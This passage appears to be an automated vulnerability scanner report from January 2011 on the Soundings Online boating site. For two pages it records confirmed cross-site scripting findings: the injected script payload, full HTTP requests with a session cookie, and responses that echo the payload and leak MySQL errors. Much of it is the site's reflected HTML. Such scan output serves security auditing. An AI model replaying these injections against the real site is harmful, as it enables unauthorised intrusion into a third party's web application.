document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_sub_services c_uncategorized m_preview_issue"><!--
Type of page: category<br />Section: 15, s_sub_services<br />Category: 96, c_uncategorized<br />Menu: 107, m_preview_issue-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.ru..
- /advertise

/advertise CONFIRMED

http://www.soundingsonline.com/advertise?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E9..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001E96)</script>

Request

GET /advertise?'"--></style></script><script>netsparker(0x001E96)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E96)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E96)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/advertise" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Showcase Your Business by Advertising in Soundings Magazine | Soundings Online</title> <link href="/advertise?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/advertise?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_advertise"><!--
Type of page: category<br />Section: 14, s_uncategorized<br />Category: 85, c_uncategorized<br />Menu: 61, m_advertise-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"&..
- /component/content/

/component/content/ CONFIRMED

http://www.soundingsonline.com/component/content/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001F5F)</script>

Request

GET /component/content/?'"--></style></script><script>netsparker(0x001F5F)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/content/article/237622
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F5F)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001F5F)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/component/content/?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/component/content/?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <!-- JoomlaWorks "AllVideos" Plugin (v2.5.3) starts here -->
<style type="text/css" media="all">
@import "http://www.soundingsonline.com/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>

<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/silverlight.js"></script>
<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/wmvplayer.js"></script>
<script type="text/javascript" src="http://www.soundingsonline.com/plugins/content/jw_allvideos/players/AC_QuickTime.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5.3) ends here -->

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_uncategorized"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

